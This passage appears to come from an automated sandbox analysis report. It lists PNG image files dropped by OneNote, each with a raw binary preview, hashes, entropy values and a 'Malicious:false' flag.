                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
